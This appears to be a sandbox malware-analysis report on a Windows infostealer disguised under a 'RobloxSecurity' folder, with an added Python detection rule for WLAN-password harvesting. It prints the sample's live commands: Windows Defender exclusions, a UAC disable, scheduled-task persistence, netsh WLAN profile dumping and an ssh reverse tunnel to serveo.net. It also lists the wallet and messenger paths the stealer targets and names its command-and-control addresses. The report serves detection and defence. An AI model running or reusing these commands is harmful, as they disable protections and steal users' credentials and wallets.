                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess created: C:\Windows\System32\OpenSSH\ssh.exe "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6787 serveo.net
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess created: C:\Windows\System32\OpenSSH\ssh.exe "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6787 serveo.net
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "add-mppreference -exclusionpath 'c:\users\user\desktop\jqohoupmjp.exe'; add-mppreference -exclusionprocess 'jqohoupmjp'; add-mppreference -exclusionpath 'c:\windows'; add-mppreference -exclusionpath 'c:\users\user'
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe" /c chcp 65001 && timeout /t 3 > nul && schtasks /create /tn "vkefq4cv.oil" /sc minute /tr "c:\users\user\appdata\local\robloxsecurity\vkefq4cv.oil.exe" /rl highest /f && del /f /s /q /a "c:\users\user\appdata\local\temp\vkefq4cv.oil.exe" &&start "" "c:\users\user\appdata\local\robloxsecurity\vkefq4cv.oil.exe
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe | Queries volume information: C:\Users\user\Desktop\jqOHOuPMJP.exe VolumeInformation
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Queries volume information: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe VolumeInformation
                  Source: C:\Windows\System32\netsh.exe | Queries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Queries volume information: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe VolumeInformation
                  Source: C:\Windows\System32\netsh.exe | Queries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Queries volume information: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe VolumeInformation
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Lowering of HIPS / PFW / Operating System Security Settings

                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                  Source: Amcache.hve.41.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.41.dr | Binary or memory string: msmpeng.exe
                  Source: Amcache.hve.41.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: Amcache.hve.41.dr | Binary or memory string: MsMpEng.exe

                  Stealing of Sensitive Information

                  Source: Yara match | File source: 0000002D.00000002.3553295709.00000167D1889000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000002C.00000002.2953825020.000001EC01AD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: vkefq4cv.oil.exe PID: 7316, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: vkefq4cv.oil.exe PID: 7712, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: vkefq4cv.oil.exe PID: 125704, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: vkefq4cv.oil.exe PID: 325468, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: vkefq4cv.oil.exe PID: 7620, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: vkefq4cv.oil.exe PID: 8072, type: MEMORYSTR
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: tring><string>config.json;sql\db.sqlite</string><string>Grabber\Session</string></args></command><command name="0"><args><string>%AppData%\tox</string><string>*.db;*.tox;*.ini;*.json;*.hstr</string><string>Grabber\Tox</string></args></command><command name="0"><args><string>%AppData%\.purple</string><string>accounts.xml</string><string>Apps\Pidgin</string></args></command><command name="5"><args><string>Telegram;tdata</string><string>%AppData%\Telegram Desktop\tdata</string><string>*s;????????????????\*s</string><string>Grabber\Telegram</string></args></command><command name="0"><args><string>%AppData%\ledger live</string><string>app.json</string><string>Grabber\Wallets\Ledger</string></args></command><command name="0"><args><string>%AppData%\atomic\Local Storage\leveldb</string><string>*.l??</string><string>Grabber\Wallets\Atomic</string></args></command><command name="0"><args><string>%AppData%\WalletWasabi\Client\Wallets</string><string>*.json</string><string>Grabber\Wallets\Wasabi</string></args></command><command name="0"><args><string>%AppData%\Binance</string><string>*.json</string><string>Grabber\Wallets\Binance</string></args></command><command name="0"><args><string>%AppData%\Guarda\Local Storage\leveldb</string><string>*.l??</string><string>Grabber\Wallets\Guarda</string></args></command><command name="0"><args><string>%LocalAppData%\Coinomi\Coinomi\wallets</string><string>*.wallet</string><string>Grabber\Wallets\Coinomi</string></args></command><command name="0"><args><string>%AppData%\Bitcoin\wallets</string><string>*\*wallet*</string><string>Grabber\Wallets\Bitcoin</string></args></command><command name="0"><args><string>%AppData%\Electrum\wallets</string><string>*</string><string>Grabber\Wallets\Electrum</string></args></command><command name="0"><args><string>%AppData%\Electrum-LTC\wallets</string><string>*</string><string>Grabber\Wallets\Electrum-LTC</string></args></command><command name="0"><args><string>%AppData%\Zcash</string><string>*wallet*dat</string><string>Grabber\Wallets\Zcash</string></args></command><command name="0"><args><string>%AppData%\Exodus</string><string>exodus.conf.json;exodus.wallet\*.seco</string><string>Grabber\Wallets\Exodus</string></args></command><command name="0"><args><string>%AppData%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxLiberty</string></args></command><command name="0"><args><string>%AppData%\Jaxx\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxClassic</string></args></command><command name="0"><args><string>%UserProfile%\Documents\Monero\wallets</string><string>*\*</string><string>Grabber\Wallets\Monero</string></args></command><command name="0"><args><string>%AppData%\MyMonero</string><string>FundsRequests*;PasswordMeta*;Wallets*</string><string>Grabber\Wallets\MyMonero</string></args></command><command name="3"><args><string>Metamask</string><string>nkbihfbeogaeaoehlefnkodbefgpgknn</string><
                  Source: powershell.exe, 00000001.00000002.1715254235.00000000062C6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: # AutoUnlockKeyStored. Win32_EncryptableVolume::IsAutoUnlockKeyStored
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: Yara matchFile source: 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: vkefq4cv.oil.exe PID: 7620, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: vkefq4cv.oil.exe PID: 8072, type: MEMORYSTR
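The cmd.exe / netsh.exe pairs above are the WLAN-profile harvesting step that the "Tries to harvest and steal WLAN passwords" signature fires on: the stealer wraps `netsh wlan show profiles` in `cmd.exe /c chcp 65001 && ... | findstr` so that it gets a UTF-8 listing of profile names it can scrape. The detection below is an added example, not code from Joe Sandbox or from the sample. It scores a netsh event by its parent chain rather than by the command line alone, and runs over constructed process-creation events modelled on this report's process tree; the PIDs, the benign interactive console session and the `key=clear` follow-up event are assumptions, not observations from the report.

```python
"""Score netsh WLAN-profile enumeration by its parent chain.

Added example for this report, not code from Joe Sandbox or from the sample.
Events below are constructed to mirror the report's process tree; PIDs, the
benign console session and the key=clear event are assumptions.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


# netsh enumerating or dumping WLAN profiles
WLAN_PROFILE = re.compile(r"\bwlan\s+show\s+profiles?\b", re.IGNORECASE)
# the form that prints the pre-shared key in clear text
KEY_CLEAR = re.compile(r"\bkey\s*=\s*clear\b", re.IGNORECASE)
# cmd.exe wrapper seen in this report: switch to UTF-8, enumerate, scrape names with findstr
WRAPPER = re.compile(r"chcp\s+65001.*netsh\s+wlan\s+show\s+profiles?.*findstr",
                     re.IGNORECASE | re.DOTALL)
# a grandparent living in a user-writable location is the stealer tell
USER_WRITABLE = re.compile(r"\\AppData\\(Local|Roaming)\\|\\Temp\\|\\Users\\Public\\|\\Downloads\\",
                           re.IGNORECASE)

# Constructed sample events (PIDs invented; paths and command lines taken from the report)
SAMPLE_EVENTS: List[ProcEvent] = [
    ProcEvent(7620, 7316, r"C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe",
              "vkefq4cv.oil.exe"),
    ProcEvent(7800, 7620, r"C:\Windows\System32\cmd.exe",
              'cmd.exe /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"'),
    ProcEvent(7801, 7800, r"C:\Windows\System32\chcp.com", "chcp 65001"),
    ProcEvent(7802, 7800, r"C:\Windows\System32\netsh.exe", "netsh wlan show profiles"),
    ProcEvent(7803, 7800, r"C:\Windows\System32\findstr.exe", 'findstr /R /C:"[ ]:[ ]"'),
    # assumed follow-up that dumps one PSK (not recorded in this report)
    ProcEvent(7900, 7800, r"C:\Windows\System32\netsh.exe",
              'netsh wlan show profile name="Office" key=clear'),
    # assumed benign: an admin typing the same enumeration into an interactive console
    ProcEvent(9000, 1, r"C:\Windows\System32\cmd.exe", '"C:\\Windows\\system32\\cmd.exe"'),
    ProcEvent(9001, 9000, r"C:\Windows\System32\netsh.exe", "netsh wlan show profiles"),
]


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def classify(events: List[ProcEvent]) -> Dict[int, Tuple[str, str]]:
    """Map the pid of every WLAN-profile netsh event to (severity, reason)."""
    by_pid = {e.pid: e for e in events}
    findings: Dict[int, Tuple[str, str]] = {}
    for ev in events:
        if _basename(ev.image) != "netsh.exe" or not WLAN_PROFILE.search(ev.cmdline):
            continue
        if KEY_CLEAR.search(ev.cmdline):
            findings[ev.pid] = ("high", "key=clear reveals the pre-shared key")
            continue
        parent = by_pid.get(ev.ppid)
        if parent and _basename(parent.image) == "cmd.exe" and WRAPPER.search(parent.cmdline):
            grand = by_pid.get(parent.ppid)
            if grand and USER_WRITABLE.search(grand.image):
                findings[ev.pid] = ("high", f"chcp/netsh/findstr wrapper launched by {grand.image}")
            else:
                findings[ev.pid] = ("medium", "chcp 65001 && netsh wlan show profiles | findstr wrapper")
            continue
        findings[ev.pid] = ("info", "WLAN profile enumeration without a stealer-style parent")
    return findings


if __name__ == "__main__":
    for pid, (severity, reason) in sorted(classify(SAMPLE_EVENTS).items()):
        print(f"pid {pid}: {severity} - {reason}")
```

The `key=clear` branch matters because `netsh wlan show profiles` on its own only lists names; the key is only printed by `netsh wlan show profile name=<ssid> key=clear`, so a rule keyed on the enumeration alone would page on every help-desk session. Walking two levels up the process tree and checking where the grandparent binary lives is what separates the sample's chain (wrapper spawned from `%LocalAppData%\RobloxSecurity`) from an administrator in a console.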

                  Remote Access Functionality

                  Source: Yara matchFile source: 0000002D.00000002.3553295709.00000167D1889000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000002C.00000002.2953825020.000001EC01AD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: vkefq4cv.oil.exe PID: 7316, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: vkefq4cv.oil.exe PID: 7712, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: vkefq4cv.oil.exe PID: 125704, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: vkefq4cv.oil.exe PID: 325468, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: vkefq4cv.oil.exe PID: 7620, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: vkefq4cv.oil.exe PID: 8072, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: vkefq4cv.oil.exe PID: 8072, type: MEMORYSTR
ATT&CK matrix by tactic (bracketed figures are the report's per-technique signature badges, copied as printed; techniques without a figure had no matching signature)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: Windows Management Instrumentation [221]; Command and Scripting Interpreter [1]; Scheduled Task/Job [1]; Cron; Launchd; Scheduled Task; Systemd Timers
Persistence: DLL Side-Loading [1]; Scheduled Task/Job [1]; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Privilege Escalation: DLL Side-Loading [1]; Process Injection [11]; Scheduled Task/Job [1]; Login Hook; Network Logon Script; RC Scripts; Startup Items
Defense Evasion: Disable or Modify Tools [31]; Obfuscated Files or Information [2]; Timestomp [1]; DLL Side-Loading [1]; Masquerading [1]; Virtualization/Sandbox Evasion [161]; Process Injection [11]
Credential Access: OS Credential Dumping [1]; Credentials in Registry [1]; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: File and Directory Discovery [1]; System Information Discovery [24]; Security Software Discovery [241]; Process Discovery [1]; Virtualization/Sandbox Evasion [161]; Application Window Discovery [1]; System Network Configuration Discovery [1]
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: Archive Collected Data [1]; Data from Local System [2]; Email Collection [1]; Clipboard Data [1]; Keylogging; GUI Input Capture; Web Portal Capture
Command and Control: Web Service [1]; Ingress Tool Transfer [1]; Encrypted Channel [21]; Non-Standard Port [1]; Non-Application Layer Protocol [2]; Application Layer Protocol [3]; Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
Behavior Graph
ID: 1390172; Sample: jqOHOuPMJP.exe; Start date: 10/02/2024; Architecture: WINDOWS; Score: 100
Contacted domains: api.telegram.org; serveo.net; ip-api.com
Sample-level signatures: Multi AV Scanner detection for domain / URL; Found malware configuration; Antivirus detection for URL or domain; 11 other signatures; Uses the Telegram API (likely for C&C communication) (attached to api.telegram.org)
Figures after a process name are the report's created-registry-value and created-file counters, as printed.

Process tree (indentation shows parent and child):

jqOHOuPMJP.exe (16 5)
    Network: 82.147.85.194, 49729, 80, SIBTEL-ASRU Russian Federation
    Dropped: C:\Users\user\AppData\...\vkefq4cv.oil.exe, PE32
    Signatures: Adds a directory exclusion to Windows Defender; Disables UAC (registry)
    vkefq4cv.oil.exe (6)
        Dropped: C:\Users\user\AppData\...\vkefq4cv.oil.exe, PE32
        Signatures: Machine Learning detection for dropped file; Found many strings related to Crypto-Wallets (likely being stolen)
        cmd.exe (1)
            Signatures: Uses schtasks.exe or at.exe to add and modify task schedules; Uses netsh to modify the Windows network and firewall settings; Tries to harvest and steal WLAN passwords
            vkefq4cv.oil.exe (14 5)
                Network: ip-api.com 208.95.112.1, 49737, 49739, 80, TUT-ASUS United States; api.telegram.org 149.154.167.220, 443, 49743, 49744, TELEGRAMRU United Kingdom; 2 other IPs or domains
                Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Tries to steal Mail credentials (via file / registry access); 3 other signatures
                cmd.exe
                    Signatures: Tries to harvest and steal WLAN passwords
                    conhost.exe; chcp.com; netsh.exe; findstr.exe
                cmd.exe
                    conhost.exe; chcp.com; netsh.exe; findstr.exe
                ssh.exe
                    Network: serveo.net 138.68.79.95, 22, 49740, 49742, DIGITALOCEAN-ASNUS United States
                    conhost.exe
            conhost.exe
            timeout.exe (1)
            2 other processes
    powershell.exe (22)
        WmiPrvSE.exe
        conhost.exe
vkefq4cv.oil.exe
    Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Tries to harvest and steal WLAN passwords
    cmd.exe
        Signatures: Tries to harvest and steal WLAN passwords
        conhost.exe; chcp.com; netsh.exe; findstr.exe
    cmd.exe
        4 other processes
    ssh.exe
        conhost.exe
    WerFault.exe
vkefq4cv.oil.exe
3 other processes

Screenshots (thumbnails not reproduced)
Antivirus, Machine Learning and Genetic Malware Detection

Initial sample
Source | Detection | Scanner | Label / Link
jqOHOuPMJP.exe | 13% | ReversingLabs |
jqOHOuPMJP.exe | 24% | Virustotal | Browse
jqOHOuPMJP.exe | 100% | Joe Sandbox ML |

Dropped files
Source | Detection | Scanner | Label / Link
C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | 100% | Joe Sandbox ML |

No Antivirus matches

Domains
Source | Detection | Scanner | Label / Link
serveo.net | 8% | Virustotal | Browse
URLs
Source | Detection | Scanner | Label / Link
http://pesterbdd.com/images/Pester.png | 100% | URL Reputation | malware
https://contoso.com/Icon | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
http://www.microsoft.co(= | 0% | Avira URL Cloud | safe
https://e2111f95f52ba8be6b2d3394e38b1722.se | 0% | Avira URL Cloud | safe
http://crl.v | 0% | URL Reputation | safe
http://193.142.58.127:80 | 0% | Avira URL Cloud | safe
http://23.224.102.6:8001 | 0% | Avira URL Cloud | safe
http://216.250.190.139:80 | 100% | Avira URL Cloud | malware
http://185.119.118.59:8080 | 0% | Avira URL Cloud | safe
http://216.250.190.139:80 | 8% | Virustotal | Browse
http://193.142.58.127:80 | 7% | Virustotal | Browse
http://185.119.118.59:8080/get/s9VbfeJdTs/hkLYW_user | 0% | Avira URL Cloud | safe
http://185.119.118.59:8080 | 1% | Virustotal | Browse
http://185.119.118.59:80802 | 0% | Avira URL Cloud | safe
http://107.161.20.142:8080 | 0% | Avira URL Cloud | safe
http://107.161.20.142:8080 | 3% | Virustotal | Browse
http://127.0.0.1:18772/handleOpenWSR?r=http://185.119.118.59:8080/get/s9VbfeJdTs/hkLYW_user | 0% | Avira URL Cloud | safe
